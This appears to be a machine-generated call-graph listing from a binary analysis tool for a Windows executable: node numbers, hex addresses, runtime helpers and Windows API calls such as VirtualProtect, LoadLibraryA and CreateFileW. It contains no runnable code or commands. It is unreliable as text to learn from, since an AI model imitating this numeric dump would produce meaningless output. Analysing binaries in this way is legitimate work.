11 API calls 18093->18094 18094->18090 18097 41d5c0 18095->18097 18096->18083 18098 41d99a _free 20 API calls 18097->18098 18098->18099 18099->18080 18099->18083 18099->18085 18101 41b130 18100->18101 18102 41d78d 18100->18102 18104 41d7a7 18101->18104 18102->18101 18108 4209f2 18102->18108 18105 41d7ba 18104->18105 18107 41d7cf 18104->18107 18105->18107 18126 41f603 18105->18126 18107->18073 18109 4209fe BuildCatchObjectHelperInternal 18108->18109 18110 41d533 pre_c_initialization 23 API calls 18109->18110 18111 420a07 18110->18111 18112 420a4c __onexit 18111->18112 18118 41d8de EnterCriticalSection 18111->18118 18112->18101 18114 420a25 18119 420a69 18114->18119 18118->18114 18120 420a39 18119->18120 18121 420a77 pre_c_initialization 18119->18121 18123 420a58 18120->18123 18121->18120 18122 4207a5 pre_c_initialization 20 API calls 18121->18122 18122->18120 18124 41d926 _CallSETranslator LeaveCriticalSection 18123->18124 18125 420a5f 18124->18125 18125->18112 18127 41d533 pre_c_initialization 23 API calls 18126->18127 18128 41f60d 18127->18128 18129 41f528 __fassign 20 API calls 18128->18129 18130 41f613 18129->18130 18130->18107 18136 41f2b3 18131->18136 18140 41f35d 18131->18140 18133 41a247 _ValidateLocalCookies 5 API calls 18135 41f409 18133->18135 18135->18044 18141 420604 18136->18141 18139 421254 __strnicoll 28 API calls 18139->18140 18140->18133 18142 41b0d9 __fassign 23 API calls 18141->18142 18143 420624 MultiByteToWideChar 18142->18143 18146 42065d 18143->18146 18153 4206e1 18143->18153 18145 41a247 _ValidateLocalCookies 5 API calls 18148 41f314 18145->18148 18147 41e08c __strnicoll 21 API calls 18146->18147 18150 420675 __strnicoll ___scrt_fastfail 18146->18150 18147->18150 18155 421254 18148->18155 18149 4206db 18160 420708 18149->18160 18150->18149 18152 4206b1 MultiByteToWideChar 18150->18152 18152->18149 18154 4206cb GetStringTypeW 18152->18154 18153->18145 18154->18149 18156 41b0d9 __fassign 23 API calls 18155->18156 18157 421267 18156->18157 18164 42106e 18157->18164 18161 420725 18160->18161 18162 420714 18160->18162 18161->18153 18162->18161 18163 41d99a _free 20 API calls 18162->18163 18163->18161 18165 421089 __strnicoll 18164->18165 18166 4210af MultiByteToWideChar 18165->18166 18167 4210db 18166->18167 18168 42122c 18166->18168 18173 41e08c __strnicoll 21 API calls 18167->18173 18175 4210f0 __strnicoll 18167->18175 18169 41a247 _ValidateLocalCookies 5 API calls 18168->18169 18170 41f335 18169->18170 18170->18139 18171 421193 18177 420708 __freea 20 API calls 18171->18177 18172 421128 MultiByteToWideChar 18172->18171 18174 42113f 18172->18174 18173->18175 18191 41de4b 18174->18191 18175->18171 18175->18172 18177->18168 18179 4211a2 18181 41e08c __strnicoll 21 API calls 18179->18181 18185 4211b4 __strnicoll 18179->18185 18180 42116a 18180->18171 18183 41de4b __strnicoll 11 API calls 18180->18183 18181->18185 18182 42121d 18184 420708 __freea 20 API calls 18182->18184 18183->18171 18184->18171 18185->18182 18186 41de4b __strnicoll 11 API calls 18185->18186 18187 4211fc 18186->18187 18187->18182 18188 42120b WideCharToMultiByte 18187->18188 18188->18182 18189 42124b 18188->18189 18190 420708 __freea 20 API calls 18189->18190 18190->18171 18192 41d9ee __strnicoll 5 API calls 18191->18192 18193 41de61 18192->18193 18194 41de67 18193->18194 18195 41debf __strnicoll 10 API calls 18193->18195 18197 41a247 _ValidateLocalCookies 5 API calls 18194->18197 18196 41dea7 LCMapStringW 18195->18196 18196->18194 18198 41deb9 18197->18198 18198->18171 18198->18179 18198->18180 18199->18056 18210 41f810 18200->18210 18202 41f102 18203 41f810 26 API calls 18202->18203 18204 41f121 18203->18204 18205 41f0c0 18204->18205 18206 41d99a _free 20 API calls 18204->18206 18207 41f0d4 18205->18207 18206->18205 18224 41d926 LeaveCriticalSection 18207->18224 18209 41f0de 18209->18060 18211 41f821 18210->18211 18217 41f81d 18210->18217 18212 41f828 18211->18212 18213 41f83b ___scrt_fastfail 18211->18213 18214 41d0a3 __strnicoll 20 API calls 18212->18214 18213->18217 18218 41f872 18213->18218 18219 41f869 18213->18219 18215 41f82d 18214->18215 18216 41cfe6 __strnicoll 26 API calls 18215->18216 18216->18217 18217->18202 18218->18217 18222 41d0a3 __strnicoll 20 API calls 18218->18222 18220 41d0a3 __strnicoll 20 API calls 18219->18220 18221 41f86e 18220->18221 18223 41cfe6 __strnicoll 26 API calls 18221->18223 18222->18221 18223->18217 18224->18209 18226 41bb4c 18225->18226 18227 41bb3e 18225->18227 18228 41d0a3 __strnicoll 20 API calls 18226->18228 18227->18226 18229 41bb63 18227->18229 18233 41bb54 18228->18233 18231 41bb5e 18229->18231 18232 41d0a3 __strnicoll 20 API calls 18229->18232 18230 41cfe6 __strnicoll 26 API calls 18230->18231 18231->17977 18232->18233 18233->18230 18235 41c478 18234->18235 18239 41c442 18234->18239 18236 41c48f 18235->18236 18238 41d99a _free 20 API calls 18235->18238 18237 41d99a _free 20 API calls 18236->18237 18237->18239 18238->18235 18239->17976 18241 406648 FindCloseChangeNotification CloseHandle CloseHandle FreeLibrary 18240->18241 18243 4065cd 18240->18243 18241->17594 18242 4065f2 VirtualProtect 18242->18243 18243->18241 18243->18242 18244 406625 VirtualProtect 18243->18244 18244->18243 18546 41b750 18245->18546 18247 4067eb 18248 4067f1 GetVersionExW 18247->18248 18249 406810 18248->18249 18250 40770d MessageBoxA 18248->18250 18249->18250 18251 40682a 18249->18251 18308 40695e 18250->18308 18552 41158b 18251->18552 18254 41158b 22 API calls 18255 40684b 18254->18255 18256 41158b 22 API calls 18255->18256 18257 406853 18256->18257 18555 406390 LoadLibraryA #17 18257->18555 18263 406875 18588 405174 18263->18588 18265 40687e 18600 40575f 18265->18600 18267 406894 18617 404435 18267->18617 18270 40575f 22 API calls 18271 4068a8 GetCommandLineW 18270->18271 18272 40575f 22 API calls 18271->18272 18273 4068b9 18272->18273 18620 404031 18273->18620 18275 4068d5 wsprintfW 18276 4068e5 18275->18276 18277 40575f 22 API calls 18276->18277 18278 4068fc 18277->18278 18625 405c24 18278->18625 18281 405c24 3 API calls 18283 406953 18281->18283 18285 406965 18283->18285 18286 406959 18283->18286 18284 40691f 18284->18281 18287 405c24 3 API calls 18285->18287 18878 40648f 18286->18878 18289 406970 18287->18289 18290 406983 18289->18290 18291 406976 18289->18291 18293 405c24 3 API calls 18290->18293 18894 401e60 18291->18894 18294 406993 18293->18294 18295 404031 22 API calls 18294->18295 18296 4069b0 GetModuleFileNameW 18295->18296 18297 4069bc 18296->18297 18298 4069cd 18296->18298 18902 409be6 18297->18902 18300 405c24 3 API calls 18298->18300 18312 4069f1 18300->18312 18301 406bb5 18630 411656 18301->18630 18303 406bc4 18304 411656 22 API calls 18303->18304 18306 406bd3 18304->18306 18305 405c24 3 API calls 18317 406b4b 18305->18317 18307 406c63 18306->18307 18311 4116bd 22 API calls 18306->18311 18310 404435 2 API calls 18307->18310 18308->17596 18309 41b200 30 API calls 18313 406afd 18309->18313 18314 406c84 18310->18314 18315 406c10 18311->18315 18312->18301 18312->18308 18312->18313 18316 406ad1 18312->18316 18320 4018e1 RaiseException 18312->18320 18313->18305 18318 4116bd 22 API calls 18314->18318 18319 4116bd 22 API calls 18315->18319 18316->18308 18316->18309 18316->18313 18317->18301 18322 404cf6 RaiseException 18317->18322 18321 406c8f 18318->18321 18328 406c28 18319->18328 18320->18312 18634 401468 18321->18634 18324 406b9a 18322->18324 18324->18301 18329 411656 22 API calls 18324->18329 18326 406ca3 18331 409be6 61 API calls 18326->18331 18327 406cbd 18640 411436 18327->18640 18332 411656 22 API calls 18328->18332 18329->18301 18331->18308 18333 406c53 18332->18333 18916 4041e0 18333->18916 18334 406cc5 18643 4049cf 18334->18643 18339 406cdf 18339->18308 18340 406d74 18339->18340 18341 405c24 3 API calls 18339->18341 18340->18308 18343 406dc6 18340->18343 18344 406d8e wsprintfW 18340->18344 18349 40575f 22 API calls 18340->18349 18342 406d02 18341->18342 18342->18340 18350 406d0a 18342->18350 18657 406080 18343->18657 18346 4041e0 46 API calls 18344->18346 18346->18340 18349->18340 18350->18308 18943 405f70 18350->18943 18351 406dd8 18351->18308 18692 4060a2 18351->18692 18354 406d59 18354->18308 18357 409be6 61 API calls 18354->18357 18357->18308 18358 406df5 18359 4049cf 79 API calls 18358->18359 18360 406e0c 18359->18360 18361 4060a2 48 API calls 18360->18361 18362 406e14 18361->18362 18765 40149d 18362->18765 18547 41b75c BuildCatchObjectHelperInternal 18546->18547 19235 41d8de EnterCriticalSection 18547->19235 18549 41b767 pre_c_initialization 19236 41b7a7 18549->19236 18551 41b79c __onexit 18551->18247 19240 419a10 18552->19240 18556 4063b7 18555->18556 19260 40478c 18556->19260 18558 4063bc 18559 4041e0 46 API calls 18558->18559 18560 4063c3 18559->18560 18561 4041e0 46 API calls 18560->18561 18562 4063cf 18561->18562 18563 4041e0 46 API calls 18562->18563 18564 4063db 18563->18564 18565 4041e0 46 API calls 18564->18565 18566 4063e7 18565->18566 18567 4041e0 46 API calls 18566->18567 18568 4063f3 18567->18568 18569 4041e0 46 API calls 18568->18569 18570 4063ff 18569->18570 18571 4041e0 46 API calls 18570->18571 18577 40640b 18571->18577 18572 406423 SHGetSpecialFolderPathW 18573 406437 wsprintfW 18572->18573 18572->18577 18575 40575f 22 API calls 18573->18575 18574 40648a GetCommandLineW 18578 404cf6 18574->18578 18575->18577 18576 40575f 22 API calls 18576->18577 18577->18572 18577->18574 18577->18576 18579 404d4b 18578->18579 18581 404d0c 18578->18581 18580 404d3b 18579->18580 18583 4018e1 RaiseException 18579->18583 18584 4116bd 18580->18584 18581->18580 18582 4018e1 RaiseException 18581->18582 18582->18581 18583->18579 18585 4116cd 18584->18585 18586 419a10 22 API calls 18585->18586 18587 4116ec 18585->18587 18586->18587 18587->18263 18589 41158b 22 API calls 18588->18589 18599 405183 18589->18599 18590 411656 22 API calls 18591 40528a 18590->18591 18591->18265 18592 4018e1 RaiseException 18592->18599 18593 40527c 18593->18590 18595 41158b 22 API calls 18595->18599 18597 411656 22 API calls 18597->18599 18599->18592 18599->18593 18599->18595 18599->18597 19267 411415 18599->19267 19270 40582b 18599->19270 19276 41181d 18599->19276 18601 41158b 22 API calls 18600->18601 18602 40576d 18601->18602 18603 41158b 22 API calls 18602->18603 18604 405775 18603->18604 18605 4116bd 22 API calls 18604->18605 18606 405780 18605->18606 18607 4116bd 22 API calls 18606->18607 18608 40578b 18607->18608 19290 4027db 18608->19290 18611 411554 22 API calls 18612 4057ac 18611->18612 18613 41185b RaiseException 18612->18613 18615 4057b7 18613->18615 18614 4057c4 18614->18267 18616 40575f 22 API calls 18615->18616 18616->18614 19319 40440a GetProcAddress 18617->19319 18619 40443a 18619->18270 18621 411523 22 API calls 18620->18621 18622 404045 18621->18622 18624 40405b 18622->18624 19322 411b34 18622->19322 18624->18275 18626 405c39 18625->18626 18627 405c6b lstrlenW lstrlenW 18626->18627 18628 405c8c 18626->18628 19329 404e1f 18627->19329 18628->18284 18875 41b200 18628->18875 18631 411664 18630->18631 18633 411684 18630->18633 18632 419a10 22 API calls 18631->18632 18631->18633 18632->18633 18633->18303 18635 401473 18634->18635 18636 401492 18635->18636 19341 4106d5 18635->19341 18636->18326 18636->18327 18641 419a10 22 API calls 18640->18641 18642 411443 18641->18642 18642->18334 18644 411436 22 API calls 18643->18644 18645 4049df 18644->18645 18656 4106d5 3 API calls 18645->18656 18646 4049ee 19372 404a4a 18646->19372 18648 4049f8 18649 404a11 18648->18649 18650 404a03 18648->18650 18653 404a20 18649->18653 19403 40444d 18649->19403 18651 409be6 61 API calls 18650->18651 18654 404a0b 18651->18654 18653->18654 19421 4115af 18653->19421 18654->18339 18656->18646 18658 4116bd 22 API calls 18657->18658 18659 406093 18658->18659 18660 41185b RaiseException 18659->18660 18661 40609d 18660->18661 18662 40197d 18661->18662 18663 41158b 22 API calls 18662->18663 18664 401994 lstrlenW 18663->18664 18680 4019b3 18664->18680 18665 411554 22 API calls 18666 401cc0 18665->18666 19556 41149e 18666->19556 18667 40575f 22 API calls 18668 401d16 18667->18668 18670 411554 22 API calls 18668->18670 18672 401d22 18670->18672 18671 401cd1 18673 4116bd 22 API calls 18671->18673 18674 41149e 22 API calls 18672->18674 18679 401cdc 18673->18679 18675 401d36 18674->18675 18677 4116bd 22 API calls 18675->18677 18681 401d41 18677->18681 18678 404995 33 API calls 18678->18680 18679->18667 18680->18678 18682 41b200 30 API calls 18680->18682 18688 401c59 18680->18688 18689 401c94 18680->18689 18691 401c5f 18680->18691 19531 401914 18680->19531 18681->18351 18682->18680 18683 41158b 22 API calls 18684 401c7c 18683->18684 18685 404cf6 RaiseException 18684->18685 18686 401c89 18685->18686 19553 40183b 18686->19553 19542 401d75 18688->19542 18689->18665 18689->18679 18691->18681 18691->18683 18691->18689 18693 40476f lstrcmpW 18692->18693 18694 4060b5 18693->18694 18695 406102 18694->18695 18697 4116bd 22 API calls 18694->18697 18696 40476f lstrcmpW 18695->18696 18698 40611e 18696->18698 18699 4060cb 18697->18699 18700 40476f lstrcmpW 18698->18700 18701 4041e0 46 API calls 18699->18701 18702 40613a 18700->18702 18703 4060d2 18701->18703 18704 40476f lstrcmpW 18702->18704 18705 41185b RaiseException 18703->18705 18706 406156 18704->18706 18707 4060db 18705->18707 18708 40476f lstrcmpW 18706->18708 18709 4116bd 22 API calls 18707->18709 18710 406172 18708->18710 18711 4060f2 18709->18711 18712 406199 18710->18712 18713 40617c lstrcmpiW 18710->18713 18714 4041e0 46 API calls 18711->18714 18715 40476f lstrcmpW 18712->18715 18713->18712 18716 4060f9 18714->18716 18717 4061a4 18715->18717 18718 41185b RaiseException 18716->18718 18719 40476f lstrcmpW 18717->18719 18718->18695 18720 4061c8 18719->18720 18721 4061d4 18720->18721 19583 406763 18720->19583 18723 40476f lstrcmpW 18721->18723 18727 4061e7 18723->18727 18724 406205 18726 40476f lstrcmpW 18724->18726 18735 406217 18726->18735 18727->18724 18728 40476f lstrcmpW 18727->18728 19587 406700 18727->19587 18728->18727 18729 406235 18731 40476f lstrcmpW 18729->18731 18732 406240 18731->18732 18734 40476f lstrcmpW 18732->18734 18733 40476f lstrcmpW 18733->18735 18736 406250 18734->18736 18735->18729 18735->18733 19591 406732 18735->19591 18737 40476f lstrcmpW 18736->18737 18738 406260 18737->18738 18739 40626d 18738->18739 18741 41b200 30 API calls 18738->18741 18740 40476f lstrcmpW 18739->18740 18742 40627e 18740->18742 18741->18739 18743 40628a 18742->18743 18744 41b200 30 API calls 18742->18744 18745 40476f lstrcmpW 18743->18745 18744->18743 18746 40629b 18745->18746 18747 40476f lstrcmpW 18746->18747 18748 4062b7 18747->18748 18749 40476f lstrcmpW 18748->18749 18750 4062d3 18749->18750 18751 40476f lstrcmpW 18750->18751 18752 4062ef 18751->18752 18753 40476f lstrcmpW 18752->18753 18754 40630b 18753->18754 18755 40631b 18754->18755 18756 4041e0 46 API calls 18754->18756 18757 4015a9 18755->18757 18756->18755 18758 4015b1 18757->18758 18759 4199d2 22 API calls 18758->18759 18762 4015f9 18758->18762 18760 4015bd 18759->18760 18763 4106d5 3 API calls 18760->18763 18761 4015e7 19599 40cae2 18761->19599 18762->18358 18763->18761 18766 401589 collate 18765->18766 20390 41a9f8 18875->20390 18879 407d35 24 API calls 18878->18879 18880 4064ab 18879->18880 18881 4041e0 46 API calls 18880->18881 18882 4064b9 18881->18882 18883 411554 22 API calls 18882->18883 18884 4064c3 18883->18884 18885 4064f9 wsprintfW 18884->18885 18888 41185b RaiseException 18884->18888 20426 41189c 18884->20426 18886 41185b RaiseException 18885->18886 18887 40652d 18886->18887 18890 41185b RaiseException 18887->18890 18888->18884 18891 40653a 18890->18891 18892 409d31 24 API calls 18891->18892 18893 40654f 18892->18893 18893->18308 18896 401e70 18894->18896 18901 401e87 18894->18901 18895 4025a9 27 API calls 18897 401ec8 18895->18897 18900 41b200 30 API calls 18896->18900 18896->18901 18898 401ed1 GetLastError 18897->18898 18899 401ed8 18897->18899 18898->18899 18899->18308 18900->18901 18901->18895 18903 4041e0 46 API calls 18902->18903 18904 409bfa wvsprintfW 18903->18904 18905 409c1a GetLastError FormatMessageW 18904->18905 18906 409ccd 18904->18906 18908 409c48 FormatMessageW 18905->18908 18909 409c5f lstrlenW lstrlenW 18905->18909 18907 409f0b 28 API calls 18906->18907 18910 409cd9 18907->18910 18908->18906 18908->18909 18911 419a10 22 API calls 18909->18911 18910->18308 18912 409c8e lstrcpyW lstrcpyW 18911->18912 20430 409f0b 18912->20430 18914 409cba 18915 409cc0 LocalFree 18914->18915 18915->18910 18917 4041f6 18916->18917 18918 404220 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 18917->18918 18922 404216 18917->18922 18919 4042ca SetLastError 18918->18919 18920 40425b 18918->18920 18921 4042e1 18919->18921 18919->18922 18923 419a10 22 API calls 18920->18923 18924 404302 lstrlenA 18921->18924 18926 40478c 3 API calls 18921->18926 18939 41185b 18922->18939 18925 40426f GetEnvironmentVariableW 18923->18925 18928 419a10 22 API calls 18924->18928 18927 404287 GetLastError 18925->18927 18937 4042a3 collate 18925->18937 18929 4042f4 18926->18929 18930 40428d 18927->18930 18927->18937 18931 404323 18928->18931 18929->18924 18932 404297 lstrcmpiW 18930->18932 18930->18937 18933 404335 GetLocaleInfoW 18931->18933 18934 404379 MultiByteToWideChar 18931->18934 18932->18937 18935 404368 18933->18935 18936 40435c 18933->18936 18934->18922 18935->18934 18938 41b200 30 API calls 18936->18938 18937->18919 18938->18935 18940 41186a 18939->18940 18941 4119a7 RaiseException 18940->18941 18942 411875 18941->18942 18942->18307 20438 410219 18943->20438 18946 411436 22 API calls 18948 40600c 18946->18948 18947 411554 22 API calls 18950 405fad 18947->18950 18949 4115ff 22 API calls 18948->18949 18951 406019 18949->18951 18954 403769 87 API calls 18950->18954 18957 406053 18950->18957 18952 4117e3 22 API calls 18951->18952 18953 406026 18952->18953 18955 4117e3 22 API calls 18953->18955 18956 405fd5 18954->18956 18958 406033 18955->18958 18956->18957 18961 410219 2 API calls 18956->18961 18959 4101c5 CloseHandle 18957->18959 18960 4117e3 22 API calls 18958->18960 18962 406075 18959->18962 18963 406040 18960->18963 18965 405ff3 18961->18965 18962->18354 20441 4107d3 18963->20441 18965->18946 18965->18957 19235->18549 19239 41d926 LeaveCriticalSection 19236->19239 19238 41b7ae 19238->18551 19239->19238 19242 4199d2 19240->19242 19243 406840 19242->19243 19244 41b6ba pre_c_initialization 7 API calls 19242->19244 19246 4199f3 19242->19246 19250 41b9fa 19242->19250 19243->18254 19244->19242 19245 41a557 19247 417a3f __CxxThrowException@8 RaiseException 19245->19247 19246->19245 19257 417a3f 19246->19257 19249 41a574 19247->19249 19252 41e08c pre_c_initialization 19250->19252 19251 41e0ca 19254 41d0a3 __strnicoll 20 API calls 19251->19254 19252->19251 19253 41e0b5 RtlAllocateHeap 19252->19253 19256 41b6ba pre_c_initialization 7 API calls 19252->19256 19253->19252 19255 41e0c8 19253->19255 19254->19255 19255->19242 19256->19252 19258 417a5f RaiseException 19257->19258 19258->19245 19261 4047f6 19260->19261 19262 404798 GetUserDefaultUILanguage 19260->19262 19261->18558 19263 4047b5 19262->19263 19264 4047b9 GetSystemDefaultUILanguage 19262->19264 19263->18558 19265 4047c9 GetSystemDefaultLCID 19264->19265 19266 4047ef 19264->19266 19265->19261 19266->19261 19279 411d6d 19267->19279 19271 41158b 22 API calls 19270->19271 19272 40583b 19271->19272 19273 40586c 19272->19273 19274 404031 22 API calls 19272->19274 19273->18599 19275 405853 MultiByteToWideChar 19274->19275 19275->19273 19282 4119a7 19276->19282 19278 41182f 19278->18599 19280 419a10 22 API calls 19279->19280 19281 411422 19280->19281 19281->18599 19283 4119ba 19282->19283 19284 4119cf 19282->19284 19286 411bec 19283->19286 19284->19278 19287 411c46 19286->19287 19288 417a3f __CxxThrowException@8 RaiseException 19287->19288 19289 411c5b 19288->19289 19297 4199d2 19290->19297 19293 4027f7 19312 402808 19293->19312 19300 4199d7 19297->19300 19298 41b9fa ___std_exception_copy 21 API calls 19298->19300 19299 4027e8 19299->19293 19307 40273a 19299->19307 19300->19298 19300->19299 19301 41b6ba pre_c_initialization 7 API calls 19300->19301 19303 4199f3 19300->19303 19301->19300 19302 41a557 19304 417a3f __CxxThrowException@8 RaiseException 19302->19304 19303->19302 19305 417a3f __CxxThrowException@8 RaiseException 19303->19305 19306 41a574 19304->19306 19305->19302 19308 411523 22 API calls 19307->19308 19309 40274a 19308->19309 19310 411523 22 API calls 19309->19310 19311 402756 19310->19311 19311->19293 19315 403171 19312->19315 19314 402803 19314->18611 19314->18614 19316 40317c 19315->19316 19318 40319e 19315->19318 19317 419a10 22 API calls 19316->19317 19317->19318 19318->19314 19320 404431 19319->19320 19321 404425 GetNativeSystemInfo 19319->19321 19320->18619 19321->18619 19323 411b47 19322->19323 19324 411b7a 19322->19324 19325 419a10 22 API calls 19323->19325 19326 417a3f __CxxThrowException@8 RaiseException 19324->19326 19327 411b5e 19325->19327 19328 411b8f 19326->19328 19327->18624 19330 404e30 19329->19330 19336 404e76 19329->19336 19331 404d9a CharUpperW 19330->19331 19332 404e83 19330->19332 19330->19336 19331->19330 19337 404d9a 19332->19337 19335 404d9a CharUpperW 19335->19336 19336->18628 19338 404da6 19337->19338 19339 404dac 19337->19339 19338->19339 19340 404db7 CharUpperW 19338->19340 19339->19335 19340->19339 19342 401485 19341->19342 19343 4106e7 19341->19343 19347 41026d 19342->19347 19350 410341 SetFilePointer 19343->19350 19357 4102d1 19347->19357 19351 41036f 19350->19351 19352 410365 GetLastError 19350->19352 19353 410508 19351->19353 19352->19351 19354 410511 19353->19354 19355 410515 GetLastError 19353->19355 19354->19342 19356 410521 19355->19356 19356->19342 19360 41027e 19357->19360 19363 4101e4 19360->19363 19368 4101c5 19363->19368 19365 4101ef 19366 4101f3 CreateFileW 19365->19366 19367 410214 19365->19367 19366->19367 19367->18636 19369 4101e0 19368->19369 19370 4101cd CloseHandle 19368->19370 19369->19365 19371 4101d9 19370->19371 19371->19365 19371->19369 19373 40440a 2 API calls 19372->19373 19374 404a58 19373->19374 19375 411436 22 API calls 19374->19375 19376 404a93 19375->19376 19377 411436 22 API calls 19376->19377 19378 404a9b 19377->19378 19379 411436 22 API calls 19378->19379 19380 404aa3 19379->19380 19425 4035e2 19380->19425 19385 4115af 22 API calls 19394 404ae1 19385->19394 19386 404b45 19387 4035e2 24 API calls 19386->19387 19388 404b5e 19387->19388 19390 404ec3 29 API calls 19388->19390 19389 4035e2 24 API calls 19389->19394 19391 404b70 19390->19391 19460 4117b2 19391->19460 19392 404ec3 29 API calls 19392->19394 19394->19386 19394->19389 19394->19392 19396 4117b2 22 API calls 19394->19396 19463 4117e3 19394->19463 19396->19394 19397 4035e2 24 API calls 19399 404b92 19397->19399 19398 404ec3 29 API calls 19398->19399 19399->19397 19399->19398 19400 404bf7 19399->19400 19401 4117e3 22 API calls 19399->19401 19402 4117b2 22 API calls 19399->19402 19400->18648 19401->19399 19402->19399 19404 411436 22 API calls 19403->19404 19416 404462 try_get_first_available_module 19404->19416 19405 41158b 22 API calls 19405->19416 19407 411656 22 API calls 19407->19416 19408 40474b 19515 40556d 19408->19515 19410 404739 19410->18653 19412 40582b 23 API calls 19412->19416 19413 4033a8 22 API calls 19413->19416 19414 405174 23 API calls 19415 40468c lstrcmpW 19414->19415 19415->19416 19416->19405 19416->19407 19416->19408 19416->19410 19416->19412 19416->19413 19416->19414 19417 4046c0 lstrlenW 19416->19417 19419 4027db 22 API calls 19416->19419 19420 4116bd 22 API calls 19416->19420 19502 404197 19416->19502 19507 403e09 19416->19507 19511 4040b5 19416->19511 19417->19416 19419->19416 19420->19416 19422 4115bd 19421->19422 19424 4115d0 19421->19424 19423 419a10 22 API calls 19422->19423 19422->19424 19423->19424 19424->18654 19467 4115ff 19425->19467 19427 4035fa 19428 4115ff 22 API calls 19427->19428 19429 403609 19428->19429 19471 4113b6 19429->19471 19431 403617 19432 4115ff 22 API calls 19431->19432 19433 403621 19432->19433 19434 4113b6 22 API calls 19433->19434 19435 403638 19434->19435 19436 4115ff 22 API calls 19435->19436 19438 403642 19436->19438 19437 403682 19440 403688 wsprintfA 19437->19440 19441 4036af 19437->19441 19438->19437 19439 40365d wsprintfA 19438->19439 19442 4117e3 22 API calls 19439->19442 19443 4117e3 22 API calls 19440->19443 19444 4117e3 22 API calls 19441->19444 19445 403677 19442->19445 19446 4036a4 19443->19446 19447 4036bc 19444->19447 19448 4117e3 22 API calls 19445->19448 19449 4117e3 22 API calls 19446->19449 19450 4117e3 22 API calls 19447->19450 19448->19437 19449->19441 19451 4036c4 19450->19451 19452 404ec3 19451->19452 19453 404ed0 ___scrt_uninitialize_crt 19452->19453 19458 4106d5 3 API calls 19453->19458 19454 404ee2 lstrlenA lstrlenA 19456 404f1e BuildCatchObjectHelperInternal 19454->19456 19455 404ac4 19455->19385 19456->19455 19474 41066f 19456->19474 19479 4033a8 19456->19479 19458->19454 19498 41197a 19460->19498 19464 4117f5 19463->19464 19464->19464 19465 41197a 22 API calls 19464->19465 19466 411802 19465->19466 19466->19394 19468 411611 19467->19468 19468->19468 19469 419a10 22 API calls 19468->19469 19470 411626 19468->19470 19469->19470 19470->19427 19472 411d6d 22 API calls 19471->19472 19473 4113d1 19472->19473 19473->19431 19483 41031e 19474->19483 19477 41069d GetLastError 19478 410699 19477->19478 19478->19456 19480 4033b6 19479->19480 19481 4033bb 19479->19481 19487 4119d4 19480->19487 19481->19456 19486 4102f1 ReadFile 19483->19486 19485 41033d 19485->19477 19485->19478 19486->19485 19490 411b90 19487->19490 19489 4119ea 19489->19481 19491 411ba0 19490->19491 19492 411bd6 19490->19492 19491->19492 19494 411ba8 19491->19494 19493 417a3f __CxxThrowException@8 RaiseException 19492->19493 19495 411beb 19493->19495 19496 419a10 22 API calls 19494->19496 19497 411bb1 19496->19497 19497->19489 19499 4117c4 19498->19499 19500 41198d 19498->19500 19499->19399 19501 411b90 22 API calls 19500->19501 19501->19499 19503 411436 22 API calls 19502->19503 19504 4041a4 19503->19504 19505 4041d9 19504->19505 19506 4033a8 22 API calls 19504->19506 19505->19416 19506->19504 19508 403e43 19507->19508 19509 403e17 lstrcmpW 19507->19509 19508->19416 19510 403e2e 19509->19510 19510->19508 19510->19509 19512 4040c1 19511->19512 19513 4040c9 lstrcmpW 19512->19513 19514 4040e9 19512->19514 19513->19512 19513->19514 19514->19416 19516 405588 19515->19516 19517 40557c 19515->19517 19519 411436 22 API calls 19516->19519 19530 40593b GetStdHandle WriteFile 19517->19530 19522 405592 19519->19522 19520 405583 19520->19410 19521 4055b7 19523 40582b 23 API calls 19521->19523 19522->19521 19525 4033a8 22 API calls 19522->19525 19524 4055c9 19523->19524 19526 4055d7 19524->19526 19527 4055eb 19524->19527 19525->19522 19528 409be6 61 API calls 19526->19528 19529 409be6 61 API calls 19527->19529 19528->19520 19529->19520 19530->19520 19532 411554 22 API calls 19531->19532 19533 401927 19532->19533 19534 41185b RaiseException 19533->19534 19535 401934 19534->19535 19536 40195a 19535->19536 19538 4018e1 RaiseException 19535->19538 19537 41185b RaiseException 19536->19537 19539 401967 19537->19539 19538->19535 19540 401d75 71 API calls 19539->19540 19541 40196f 19540->19541 19541->18680 19545 401d8c 19542->19545 19552 401db8 19542->19552 19543 401d8f lstrlenW 19544 404e1f CharUpperW 19543->19544 19544->19545 19545->19543 19546 401dbf 19545->19546 19545->19552 19547 411554 22 API calls 19546->19547 19551 401dc8 19547->19551 19550 40444d 68 API calls 19550->19552 19559 405873 19551->19559 19552->18691 19554 4116bd 22 API calls 19553->19554 19555 40184b 19554->19555 19555->18689 19580 411d92 19556->19580 19558 4114b9 19558->18671 19560 411436 22 API calls 19559->19560 19561 405883 19560->19561 19562 401e30 19561->19562 19565 403fe8 19561->19565 19562->19550 19564 4058a2 WideCharToMultiByte 19564->19562 19570 4113ed 19565->19570 19569 404012 _strncpy 19569->19564 19571 411d6d 22 API calls 19570->19571 19572 403ffc 19571->19572 19572->19569 19573 411ae8 19572->19573 19574 411afb 19573->19574 19575 411b1e 19573->19575 19576 419a10 22 API calls 19574->19576 19577 417a3f __CxxThrowException@8 RaiseException 19575->19577 19578 411b04 19576->19578 19579 411b33 19577->19579 19578->19569 19581 419a10 22 API calls 19580->19581 19582 411db6 19581->19582 19582->19558 19584 406781 19583->19584 19595 406669 19584->19595 19588 40670f 19587->19588 19589 406669 30 API calls 19588->19589 19590 40672e 19589->19590 19590->18727 19592 406740 19591->19592 19593 406669 30 API calls 19592->19593 19594 40675f 19593->19594 19594->18735 19598 40668a 19595->19598 19596 4066f9 19596->18721 19597 41b200 30 API calls 19597->19598 19598->19596 19598->19597 19600 40caec __EH_prolog 19599->19600 19603 40d38f 19600->19603 19605 40d3a4 19603->19605 20408 41b188 20390->20408 20392 41aa47 20395 41b0d9 __fassign 23 API calls 20392->20395 20393 41aa21 20396 41d0a3 __strnicoll 20 API calls 20393->20396 20394 41aa0a 20394->20392 20394->20393 20407 41aa31 20394->20407 20400 41aa53 20395->20400 20397 41aa26 20396->20397 20399 41cfe6 __strnicoll 26 API calls 20397->20399 20399->20407 20402 41aa79 20400->20402 20415 41d0dc 20400->20415 20401 41ad4c 20403 41b15c 26 API calls 20401->20403 20402->20401 20419 41b15c 20402->20419 20405 41b06f 20403->20405 20406 41d0a3 __strnicoll 20 API calls 20405->20406 20405->20407 20406->20407 20407->18284 20409 41b1a0 20408->20409 20410 41b18d 20408->20410 20409->20394 20411 41d0a3 __strnicoll 20 API calls 20410->20411 20412 41b192 20411->20412 20413 41cfe6 __strnicoll 26 API calls 20412->20413 20414 41b19d 20413->20414 20414->20394 20416 41d0fd 20415->20416 20417 41d0f9 